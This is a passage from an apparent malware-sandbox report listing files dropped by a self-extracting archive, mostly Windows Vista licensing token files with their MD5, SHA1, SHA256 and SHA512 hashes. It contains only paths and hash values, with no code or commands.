| SHA512 | 5415273fae692a282dfbc606f034f70a0f7238c4978b5f6ee43318c7cd9d96970d425f822ec2c29f50aa2a160ae3f5884c501616fda53c06ad3856311039c64d |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-SpiderSolitaire-ppdlic.xrm-ms
| MD5 | 21beed946490bc6c16011840bf5073a5 |
| SHA1 | e1156a0e883f7682c09f3688b9e4113726320b7b |
| SHA256 | 9f691e04bdd47408c75aa6136017a30d18021e2a3fe88bc822c1aa0e5b69097c |
| SHA512 | b9da8a965b7a554c9594150ffec35bcea224f50af9e7942711a1e917f6b601edd6d38d7b5c547799ed9684cca62d4d6d4b60e5120e9a0b845f10946943330e40 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\shell32-license-ppdlic.xrm-ms
| MD5 | f8e68c039d4391b4ce8c7db9503a5d16 |
| SHA1 | 46254944b2c36b155f902dbca9bc421c0c933f37 |
| SHA256 | 2f0202de9a6c1dfd892fef87d3f1a9086e0dc0584166f886078e3b6c5471c48a |
| SHA512 | 79925026e0bcd89044ca3e8ca5c89427d244a3ae8f45de74e0f45a0f46f4c6e3322ab71a35b11aa31bc5936c41351834708b69d0360bdfae315aeb7c410a0a70 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\shell32-license-ppdlic.xrm-ms
| MD5 | 53e9fda45791498334af0e10654fd9b9 |
| SHA1 | 2ff31de31c075333204329849edb0743e7ade0a0 |
| SHA256 | de1a0a3c8daf7e7800e342f4e963857a2c1eadcc7130ba4c740731b3a30e1a19 |
| SHA512 | 4396fba2987bdf5eb8eb3e53c3e3df8c8a0e795bbc1d98412d6157295f2afe18b74cda9c387c5f5fe9012fde14efe893b77d47bbef0b690bdf902beb2cd89b58 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\shell32-license-ppdlic.xrm-ms
| MD5 | f4ce1175aeab77a6ec1147603b2c6231 |
| SHA1 | a044f65d109805b784a8a48c3edbe8be19d70ea7 |
| SHA256 | 9622176b54121191ad63a74484b64ad506860d7afd9781134dbc929ddc9f9de8 |
| SHA512 | 04fd5aa4c9a6d82437a57a5f87576d55b8f79ac25a9dd2c7574d18ca6df07c4aa534294232d573cc5df87e9d172fd45d7f9d59d0f618576bfcff4efcac29d6b8 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Shell-PremiumInBoxGames-Chess-ppdlic.xrm-ms
| MD5 | 610dce8131e5f167efe07952355a8afd |
| SHA1 | 29a3b676d81382dda7f2cb043ee4a2f3cbc0654c |
| SHA256 | 667c03bd0997ad5b51c4432ff077139f890bdb59c72572d53dd5736a29c6dd90 |
| SHA512 | 6bd445fa724b0ab49afaa5422f7363a73756c7c1c4bffada3f36f1636246861cdf7b875c6b7471011c25f156b6de58177d46202caf9483827ff6fde9b55129e2 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Shell-MultiplayerInboxGames-Spades-ppdlic.xrm-ms
| MD5 | 79e9eeb881835d448a6ddce929ad4108 |
| SHA1 | 2d873cd9ff409a0dfb345e001e6624e86203ec95 |
| SHA256 | b4f3a53c9d882ffad11e13f2f14d060500a6630a5fa70c41810025ffbde47d55 |
| SHA512 | 1451a195bcb87caf306f88ae70d475c491567848150c341ea3c655ce0b6e982051f38df07a6a40e769da16fb747d32351bb0e13c22199d640d27af03a2fb2fd8 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\SLC-Component-SKU-OCUR-ppdlic.xrm-ms
| MD5 | e18c40ca0cb2ec2e63950872f80d7907 |
| SHA1 | a287fdfbd54869fd23d46f5b07faabbdbc4a7f28 |
| SHA256 | b879a56786cfa555b679590f064e10c1903960fb51131ba6253b71415be79ca0 |
| SHA512 | dffc0d874b821a081a883f3ad4ce4760c4a1c277973ac68a4de3542da945442220632470d29d43b382b782297e5a0c4f56aa3cf2e8d635a770fcf7485c549f8f |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\SLC-Component-SKU-OCUR-ppdlic.xrm-ms
| MD5 | d76bcd367483566b424f4be810a4851d |
| SHA1 | 9157f7c85434cace18cab040d7566d42bd01c2f2 |
| SHA256 | 533567ffc3d0c76bc5d3aa3228a36e868337c69e09256b61ccdaaebb7c7a8073 |
| SHA512 | de9117f1b89b77856fa35876824c28dc309e93bbb7ea8eeb35591c1a43b28008d2de802ffe1c840beefa5c97e5c64de5cc7355e929d3c4af294f71bf04a2ef80 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\SLC-Component-SKU-OCUR-ppdlic.xrm-ms
| MD5 | c74b672815841cb621c81bd6e907148d |
| SHA1 | d511ad8f39e39ae31188b49a6096b238f9c706a3 |
| SHA256 | 28353c379ff4368566bbe2f03c6f9a89dd4290b5018cb1e535f3aa9c18b971ed |
| SHA512 | ac3ffd58922ee8aca46e17d74ce780a52f24ad9a2488ec4c6d59dd8b75f973927a7b1b89fac8ddab89b2f2914b8d8d8a0192bfc26f897faf2ef9ff0a799bafd0 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\StickyNotesLicensing-ppdlic.xrm-ms
| MD5 | d975886ec992bbb6b985f4d5f54a5d8d |
| SHA1 | e99984b91934f95590e15e9a0ca9f4d2f54f7247 |
| SHA256 | 078e6f340c99aa738cc0d30a4eef148e83b4ff6aa6877b6dcbd78ca6a4352f29 |
| SHA512 | cf9283a47714f1ce527266b040a9278cb7c733da102a52d4a4b6c242968d93da803aa795ea8d741d95fa8e8678d5acbc65f3bc83495eabe7bbb081f8b36c7f34 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\SnippingToolLicensing-ppdlic.xrm-ms
| MD5 | 86e2fb2c0a6236e2189733d2facb2a98 |
| SHA1 | 1098eee45af4b12b5d35181b22f860c026a3440d |
| SHA256 | af37a6a01bf769051e4ae9e888b903b2a55d5786511b42d6bfc61b1d04d25a84 |
| SHA512 | ac1f2c0a7de712d3b989d4fafd9fc2739550454b2f26b2298258a117a5916fe81dffb193899910a4b40dd6ea25d82647feba485dcc3c60dcdca26a4cfb38e34c |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\SMBServer-ppdlic.xrm-ms
| MD5 | 8258842386390b3f224ffc5c95b158f4 |
| SHA1 | 486248184a475a6a5da323b46d6f4680ea4ffae7 |
| SHA256 | da20ecbbed297dad750f83681e5684de7b263c62e2db19772725ac62c76c67ea |
| SHA512 | 1e1003c87686331ac48a970b974ced1a5a2ee070238739cd2fd6af142007bfb6610be961220e606c8d15f093129197b6d2b01a71b419653c16e9c8005ee71cae |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\SMBServer-ppdlic.xrm-ms
| MD5 | bafff5458c6cd314f0f808d3135c5df5 |
| SHA1 | 5e0681cecff791bf3a76143405aa996b93473419 |
| SHA256 | e3358d23befe2c94518263c9e066298138964d6d45c83bb4befd1bc29009e504 |
| SHA512 | f6d480f9bdacfdfddc0ab697051c848f631ca96bd2b83bc20c60be022327946d0146eca8926052fd0b19692feca55c1acccdb99a94faa97f1c8c850a189a68bc |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\SMBServer-ppdlic.xrm-ms
| MD5 | 7443ebab04bfac164d28e5a246849540 |
| SHA1 | 5fd4a8ba3a20c5fd5d9769c3c1fcd7193b2b1999 |
| SHA256 | abcc57d5c4cb48f99bab71d9855f55b05503b3e4362983e7ff05b9bc366a2322 |
| SHA512 | f43a8f94bf99020dc0c32fc9e3852a8537d6597de46fb9490af5add4841efd044a88e36a3daae03b305e47b9caec9adcb1fa632f8c83f5a46e27cd09b9b62fdf |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPC-MathInputLicensing-ppdlic.xrm-ms
| MD5 | 1d02749f5f142a9a00496a7c3dda3231 |
| SHA1 | 16921994e010243669144cc2938d27d3b707d20b |
| SHA256 | 6b0e449d76fde8b8e67510436a794885c8fcf8bae43b57aee2cb612662226f17 |
| SHA512 | 029b9125173a9d00afe421b7a365f0de5c7b7f581144366a3fb6b1295d8888f3cb35b8ce843f21a4638a99250c4ff1f2e140968d33c755029591928b5019c8dd |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPC-tabbtn-ppdlic.xrm-ms
| MD5 | 81bbf79232267782b6ca6583edc741bc |
| SHA1 | d386feaaaf5c97c2e948f922dea7a0ac00629142 |
| SHA256 | ad68ac46027d6ab2957039363a9bdaff39007291af02281c06171835016ee40c |
| SHA512 | b176fcbfe64e8950ad323bd1e3132b34477ab8b6ba49f6af6858d3d63ea979a0c60d3748ceff759f0d34e19bb804a7ae022cee08f331f092c10e0832ee061227 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TabletPC-tabbtn-ppdlic.xrm-ms
| MD5 | 2083be4155fdb7c47cad2070f142539e |
| SHA1 | 487b82c0cad62039834c19bae4a38dfa3b82a4f6 |
| SHA256 | 4733d97b22c247300cc0ed618a259827dc48401792fb8daa8244496ff04ab19e |
| SHA512 | 39ae6dd9150bf1a6eafd607f0706273aa1621111a11fc9119b995adc42e43ff8b1379dae056f169c8a5f6cdbfd1108ed3889f7eb467afdcb5e60e54fcd0dfac0 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TabletPC-tabbtn-ppdlic.xrm-ms
| MD5 | 1f810139b734d9eeeeaf38830098001d |
| SHA1 | ce81976eab6a5ca23cf0fe2dc9698a7de71100c4 |
| SHA256 | e0fe3041abc7f72a6ec701bc37b1fb01bc8ada1cf63f6da083a143a5e1fece11 |
| SHA512 | 589fc1b7c7d20cc4db6ec37a5bf57dd822a282b889bb755393c334a300272650dc11d6b57086a7ae3409f42cdc85e339a0c133a8da13dfc263821cb39571a385 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPC-UIHub-ppdlic.xrm-ms
| MD5 | 4d57c5079a9fcdfddb150aefb3284851 |
| SHA1 | 687d4ad9fd88c4ff66d61a455ccb6de81ef628ae |
| SHA256 | 748f8e14e24feb16bed27a345dcb1ecb2a01bc799a34124152aa7a6cc878d9cb |
| SHA512 | defcaf79317a1bf2af1d19ecc876c782bcfe78b2ed0b59be1d6b80bf290f07b0e75c3be9ca3964273b1675e89ae118e20fa26b7a5d5ae33c9321550630b51d68 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TabletPC-UIHub-ppdlic.xrm-ms
| MD5 | 20a5db3003e1ca92bbba0cde89aaf9c8 |
| SHA1 | 2d3540d1551da7f6f34b67cb8b2c231ae3072f66 |
| SHA256 | 16c941b897beac91a95a5f87246006a0528a48edcb38bdf95ae45a5d69d68d2c |
| SHA512 | f47020bc2ed4cd08818b0dc566a54f2230dd6edfc5c0584a1190e42ac2ee0e6dd7b6d8a4648183430d6d534870334e1235183637254199e19ee7deb93b8b9ae2 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TabletPC-UIHub-ppdlic.xrm-ms
| MD5 | 779efd3c91df0caac2e76e5055830364 |
| SHA1 | 115bf50e6138827f062dd470453b4027d65c6005 |
| SHA256 | d8534a7ab6ef3a79f8b47f85ef13b04888ea49b224006c9908ddcc1a442c4406 |
| SHA512 | fe643ff15bd67b8f285fd402ddd5ddc311427ac49aaf9fd7b923916e40cada8154bb20c483d20b8c0d8934164845ec94bc30d53d6d210d756fcf5c5df7ed7ab1 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCAccessories-ppdlic.xrm-ms
| MD5 | cb31813f2805d3698ca7bd55d99092d4 |
| SHA1 | 85947a0e3b794dc16984b883f3b3993eaed7dfad |
| SHA256 | a40725024e549d1979e18510190f9d02ec088ab7ed3178e2db4069b901042e34 |
| SHA512 | 8d099432245ed722707c503084b1d1a629e8c1f3b69d2ffee7dc6d3c2fd798429463f1423dd50a3f6088dbaebbc0ca7b37196ad356faaadb3288f5ee1d3f9154 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCInputPanel-ppdlic.xrm-ms
| MD5 | 64835c36eeb2331b56bfac153f5f6df7 |
| SHA1 | 024f0d3e93d0563420e7364021606f18691216fd |
| SHA256 | ee19f5dcdd812df8138b6de03a45a37cdc9f39a86f245338b0060c1964d18e14 |
| SHA512 | e63cef4c52a9bf8d5ed21b2ca5aeed31a50d9b1d7ef61fdae6bad994ff562ff73966385dee82233271232b5434e12f724135f8f3d21db2734587cb26e92ca1d0 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCInputPanel-ppdlic.xrm-ms
| MD5 | 76df706a75912ad4a0848db1fe7dc828 |
| SHA1 | d0a7a17b0f5b23082b112d24dcf2940240f3a9fa |
| SHA256 | 33dd1f53221d3513bf5b29b8a5903ee4250032c5439e3358cd47bf905d2648a9 |
| SHA512 | 24107d1b3d637a3f8b06d2946d9eedc2e568ae69225661a0ba3f7b3caef134aff33fcd76d0a7f551b7e45668e3b59d9c3c305bbc3bccb5e873425b647d1be861 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCCoreInkRecognitionLicensing-ppdlic.xrm-ms
| MD5 | 2f1a66e0ed3b59db9922e65d8bcb211e |
| SHA1 | df70d39269b1ef4fad2e743455325782d2bca41e |
| SHA256 | f8487b9b24b961f526cc12384cea446675f234cba34db13d9146ea7c4352f82f |
| SHA512 | 2f12e23acd9220d9270b31399a1fc7aa3c79a0bf4b8d5f2d1c4cc3b0a3cf4fb8c83bfc174d4f69fbbba994a7a0efa70b848a74d6168f1c591dd48245b78290f6 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCPlatformInput-core-ppdlic.xrm-ms
| MD5 | 186016555b75261bcd0f9f14711417c3 |
| SHA1 | cbae3243fe292e9c4787c26ea62c904260276430 |
| SHA256 | 3ce0917467b3efd51e1877e2837df2341b95d25d271217fac16d0a2d743be5db |
| SHA512 | d468bf659715ddba92fa4b85566013b827ae95144f1d23b05936ab037d31634e2bffdd1dd7fd19215a7af412ced4eead9a29aadcf6096c62b0470ec8ce3dac22 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCInputPersonalization-ppdlic.xrm-ms
| MD5 | 3664c73e277dd5ca2f8ecfa5dd0f530e |
| SHA1 | effca8435427555f4bf48d15eb5af9f4d5bb0922 |
| SHA256 | cff3bad326a43041f8a96aac91fcbf1847336693a6190df5ce681c957e5a4564 |
| SHA512 | 20a9212194d7eaf2f73abcf030bb493da4f908b1866f9851d319ff5cdd5f9c20a71c52669a91f1d6f8cd6582af7fe750ebfe5edbf66f4336e638e03fe41a92b3 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCInputPersonalization-ppdlic.xrm-ms
| MD5 | eda1a44cbfd4823ff729c0c2980f4b19 |
| SHA1 | d942ca57433e7b5a9b4897f3dae6e79c62a0bab6 |
| SHA256 | 19f7c0e437f0e1aac79545259992900afb4e39bcfb4f0b2c262d106566e64503 |
| SHA512 | e435edac80df8089eba758ad81ef1238dcdfde3a4cf2556abb73cc588a2e4ef05c3452dd90a01f108ea92977a7ecffa907d9f9b1a5938b044a79c6f93a9e4c6a |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\TabletPCCoreInkRecognition-ppdlic.xrm-ms
| MD5 | 149d1b24df36956cb0331f7f8cee54ad |
| SHA1 | 479ada396bfd24c83e79d4e76e894f72c17d6a7e |
| SHA256 | 5d21f98296b4527df4b1c0d19b61f060f51dcfce41c12d59d8473e6b7db214d0 |
| SHA512 | b401898e6b55236de11c8233e3fb576495f30220e49f8ec5aa42fb2d95e37aaea2b2eddbecf88f4755a3ed459fd389040cb245341564ec8de01557fd126604cf |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCAccessories-ppdlic.xrm-ms
| MD5 | 7272640063120b9d540554478464b65c |
| SHA1 | d1ec1f1a1a2e81a365e75c1110bca8a1fbccfe92 |
| SHA256 | 9c269dc23fc9db6553a4b1fa043194d1392a1c29fc5a46635013140645af9360 |
| SHA512 | ab1e447c9cf4acc07134ffeb7e992443c1ef375dcd9d1d7b908278f02c0cef8d42038ff9f08874c52ca6aa75dded4c2b9384e8d12ca942a726f2c2425be4b5f9 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TabletPCPlatformInput-core-ppdlic.xrm-ms
| MD5 | 9004333844f593b83320e0f80a676f7f |
| SHA1 | 4371b63ff04f0d15775d0ac4b3e85ac13a570df7 |
| SHA256 | cdc92b8f0b79343de11e1e8f92ea6f8a7888226c7745111c08821e87c09a1679 |
| SHA512 | 9daeae211b4b8a6dddeb8601a85385727430cc703c84fbb17ccf6f631b084897e7d68e9aab047178664e8b8d42bf7ad5c00caf7eb98640f3501baecc4b53d5ff |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TabletPCPlatformInput-core-ppdlic.xrm-ms
| MD5 | 54041a042559f0a5278d47bca29bb0c5 |
| SHA1 | 2ea883d09377e43f92de80412340d6b64b1fb768 |
| SHA256 | ecf0b2cec5bef25e335d6374e18018731e6cc7f40ccac088f2d61f242fe12671 |
| SHA512 | e308ac489f5cd43b3bffce776183f9d47fb2d503989ca42e4fc13e6bf87ad27f31cc082c226c16d220007f5d0df375a9fff7df9ecf47577103f467338eb40feb |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\TerminalServices-DeviceRedirection-Licenses-ppdlic.xrm-ms
| MD5 | 4de3c2190b1dac1486949271fd6a280c |
| SHA1 | aafed3bc8d8aac53a32ebcc09889cc49b8452963 |
| SHA256 | c425d093109c62de70a2451b11e51c5e2b9773ce7145584c3a65fd277ac32952 |
| SHA512 | 81fb783ae4748dc94e0380d1832fd369872da5c7e09beb14ca9d1fcd361e7b5c0fe92e3935bae7560cf62db2dfc37633658bd19aea1082fd362b1a362488ee22 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\TerminalServices-DeviceRedirection-Licenses-ppdlic.xrm-ms
| MD5 | c446b03359b9d7c16545fd35c40d6e1f |
| SHA1 | da4efb3594ec69bec631258785939668271519fa |
| SHA256 | acc5c5b9d1845aa070d2aa2b2c36a7b50c7d3ff7d7f67dcf4469f26f3f50eeed |
| SHA512 | 65f62bc8ad8351db02f896177fd7a36d949dc26d05d7e8d747f9f893e760d1918d8673a6f31eae5d8232ef69476a739ab34ac769f17df5cd502b0e7c80925925 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\TerminalServices-RemoteApplications-ClientSku-ppdlic.xrm-ms
| MD5 | 64c9ef528365fa88c242788284cdee52 |
| SHA1 | d9ef36821b43259c70c9c073b686b359834316a7 |
| SHA256 | 58347e70e3db56274e60c30f85b4eb6f07b12e6febfa11a0e253a23991399845 |
| SHA512 | 1be35ac973d0f9c08b1fe6935a86e16fb4bdfe29086381c89b58bd6cff99ca1138edfffa0569e185c3d5a2901d4a6f4bf111ec40f79201634831c5098f01b4a4 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\TerminalServices-RemoteConnectionManager-UiEffects-ppdlic.xrm-ms
| MD5 | 72830612581636025945e1c460b1386b |
| SHA1 | b0f6e67de9ca0062c14d372a883c5949ac673045 |
| SHA256 | f6dd46ea39a61bcb8259be6edeab5dc269c314e903ce95c91f0015f631b747e0 |
| SHA512 | e5f3a2c068adf49aa34c923a51567007b1e933e3174db1f5a828d6a6209df715c9fbd5bcaeef6c261fe5cf4307665a7d45249281f8ceb39411d2e93bb4cb5c5b |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TerminalServices-RemoteConnectionManager-License-ppdlic.xrm-ms
| MD5 | b35a8385d0c28beadf4837e3f7d668a8 |
| SHA1 | ce2d7f9994b5f80d57a63c44d04f4d2cf61bcf21 |
| SHA256 | 20f7421a9c164087b9455d0e33c19e9baedae6d2e8b8c608579fec645c2cf1f7 |
| SHA512 | 494a326b2a9a9ac8d68154ebcf072137fc9fdc292748d19945c6ddba4998dec0a565b0a21d8a74752087259ba16b0b638f8caaae2cad1a44a8d8b21703b6c236 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TerminalServices-RemoteConnectionManager-License-ppdlic.xrm-ms
| MD5 | 1348977aa0487a60d989112b89ed4926 |
| SHA1 | 500739204eadd01ff053019460403f49c237e8de |
| SHA256 | be04eeb429b856f1b08de942c3bc8eac8158ceb308622ef6207f36634b99935f |
| SHA512 | d4c52af07617b36bf208ae5004433b263fc105f0fa3aeaf7329cb7b0371d3131284e8b89349b9d62016e4d2e5a61615f7e5325047850bd653d5b6dd5431189bc |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\TerminalServices-RemoteConnectionManager-License-ppdlic.xrm-ms
| MD5 | d40c66c818895f073a3e617f3a466c00 |
| SHA1 | ad2f5da5155e8554378f05b307525de92e6c01dd |
| SHA256 | a75faf733fb9dc1ae611cc8dcb951d849c2fb4bfca175740268e9cb2f9fdb891 |
| SHA512 | 7820f84d369a2e7ebcd32457ef53ea751524b9f9af97f1992d97ca45e4a4a2229c3ad04faf64de6dc424b1a75002be3dcd40246e733ed9b137c4928b6be1822d |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TerminalServices-RemoteConnectionManager-UiEffects-ppdlic.xrm-ms
| MD5 | 554e4edfb12c4760e1305c451c88d07e |
| SHA1 | 506ac0e3ae7de3932bb8d32976f18d2d23d51e03 |
| SHA256 | 6ab66b179948484415e11abc06bb71fe2a5d79a64f1b07693d17281614d352e7 |
| SHA512 | 2ab9b8078b250fe9f9ae2db2f7b817a48303dd2332958ef7879aee03cd60884800be98200e21ff276d94f399ff02695ab60a783b707d1a7ec46a7e392a726064 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\TerminalServices-RemoteConnectionManager-UiEffects-ppdlic.xrm-ms
| MD5 | 13ac4873830b38c9b9fc65a3cc4155c2 |
| SHA1 | 71c51b61e1dbef602e526e8b3c0050e344b220c3 |
| SHA256 | aa02430cdb25065564532a97b9979dc7189e747f3d09031326526184160785d4 |
| SHA512 | 8dfe78981af396946a2218a7bd75f55b1383e62aeb55ded792400cce0c26afe4d0e3f2f50501353dec3f45a3f5efe9de3c9216ec8dbfe794f8f2b5400bf4663b |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\VirtualPC-licensing-ppdlic.xrm-ms
| MD5 | 9018beb2601a16dc8631b11e69063cdf |
| SHA1 | 8f658b2220ed0dfe2b42a1eacf093e59efa9f61e |
| SHA256 | 6f50a8bf5d7bafa50f549a43e20f2399192200e8ca9a18e463655ae2c8700c8d |
| SHA512 | 3e985cb799db557c3535a61a5578cf00487253b8b81c8f7abd246af139273aa07ec5467da04a491a53476cd398e69a03e93004d001f40223e396715a39e9abab |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\volmgrx-ppdlic.xrm-ms
| MD5 | 730d31131dd455ff8baef77a0a93797d |
| SHA1 | d1b9a4d670446d7e18bdd119d299a36d5d389396 |
| SHA256 | 45624e0344153ec78f982ff0b53f5a7b2af92f309cea54ec874ccabf6bc4fbcd |
| SHA512 | c20eee34e9bd869bacfe1cbd36c135c014770cbc01e4dd655c41aa1fb1a1f73742243222ddc1dec9595f42dc6339bff6527288ed66aa3ede3b51178e22ca57ea |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\volmgrx-ppdlic.xrm-ms
| MD5 | de34d3089970cb4f7cb6dc0984c9ef18 |
| SHA1 | 313d10512563098c611cd34ef6538e345ecc0d8e |
| SHA256 | 46421b737215b942acb215c2f0490e2e1c26dc94556249f01777611894e795c7 |
| SHA512 | 78fab67c7f8f32437a4fa8739a05a7cd6f854e3cc3e960ea06f808a908af753baf4fb7cb6e4b7d3ef1b8b4bb478e588ea88f682d1e2ebf3dc2d5e22c4f252b80 |
C:\Users\Admin\tbtnds.dat
| MD5 | e1c03c3b3d89ce0980ad536a43035195 |
| SHA1 | 34372b2bfe251ee880857d50c40378dc19db57a7 |
| SHA256 | d2f3a053063b8bb6f66cee3e222b610321fa4e1611fc2faf6129c64d504d7415 |
| SHA512 | 6ea0233df4a093655387dae11e935fb410e704e742dbcf085c403630e6b034671c5235af15c21dfbb614e2a409d412a74a0b4ef7386d0abfffa1990d0f611c70 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\VirtualXP-licensing-ppdlic.xrm-ms
| MD5 | dfc4b7581d4df4d903c54ce7c74b784c |
| SHA1 | 276c3126131f65d8ac8a103e3eef2a12da7246b4 |
| SHA256 | 2923cd708713ac2d3b098e25fa9e8f7be5d1e8f826970a92b52faf314daae81e |
| SHA512 | fb23e45faed1d5b8573f40f114221951dfe322f1a9d50fdc43030573621232956afbab1cb5c2209114ee3f430dc654ee79a92cffeaf49996e96992d63dda9755 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomeBasic\tokens\ppdlic\WindowsAnytimeUpgrade-ppdlic.xrm-ms
| MD5 | b43b38745dd63ccd94f055ee5f2d1f44 |
| SHA1 | e9cb3554a4b80eae5ec806c28dd6c5914b08460e |
| SHA256 | a57d5de90613281fc13571fd0eebcbd87768bf4d44f226d967826add07546cfb |
| SHA512 | a887f8f949e9b05ef8f2fcb63c2814e889ce051b2183ee4773d06407dc40d8b31117115a766df4b8ddeba2581377e957dc3730c2fc0710720e69132fcfa579a6 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Starter\tokens\ppdlic\WindowsAnytimeUpgrade-ppdlic.xrm-ms
| MD5 | 7e64d7348def778ca013ecbbf73e8cf1 |
| SHA1 | b01f21edd8f7b069c1b6f484a059603635cc5b37 |
| SHA256 | 1e44dc19aed5c919c0a50e6c4455cf90c4522ab15bdd9d191062ee1ab49ce6fd |
| SHA512 | e527c90674605ef3405aaa699336214d47dec7662578ac5e579683d8a42de7ee6c37937e376f85fb3ed69b33ad7a247bf47f5faad019fc0547520f035f783472 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\WindowsAnytimeUpgrade-ppdlic.xrm-ms
| MD5 | 740b0f346ab31e4f354a44ac49e796bb |
| SHA1 | d44771c67e08040aef486e2804ed4728453e34b0 |
| SHA256 | ea5b539c83a95fc45951c516f81e4cb3a702acec6965652deca8b5fce83fd0e1 |
| SHA512 | 940bd81773efa49da9320ff7cc9a74e25076bf5f52c22ff9c9ccd7bb0442fc4ea52bdd0be5fad7c35aec823394b41356d08f6659f36594a44222bc70eb64278d |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\WindowsSearchComponent-ppdlic.xrm-ms
| MD5 | 006419122b2c2c2a655a9edbd11cdc89 |
| SHA1 | 5afdd2940abf8aadfab394032b428dc05542e18d |
| SHA256 | 8b65bcfa2957fa857597036657d02261234c8076233ac7a2572b4f98fc77f201 |
| SHA512 | d15545d1d8655fd832ba9349913a58a63c268c7dd1d374edfc43a8c362017c8e9316743628fe4721112d9af5a99181bfb03469f02fd7167f41ff3b81a5e46007 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\WMPPlayer-ppdlic.xrm-ms
| MD5 | d0b049f0a759818178a86b8a8ee85a56 |
| SHA1 | f4f2da7147ff4ec991c3dc237b71d769054f3a43 |
| SHA256 | 88c73f28b888a7ec4d757838ea8ee192e5825c71fe90bd716fd1df60663865d8 |
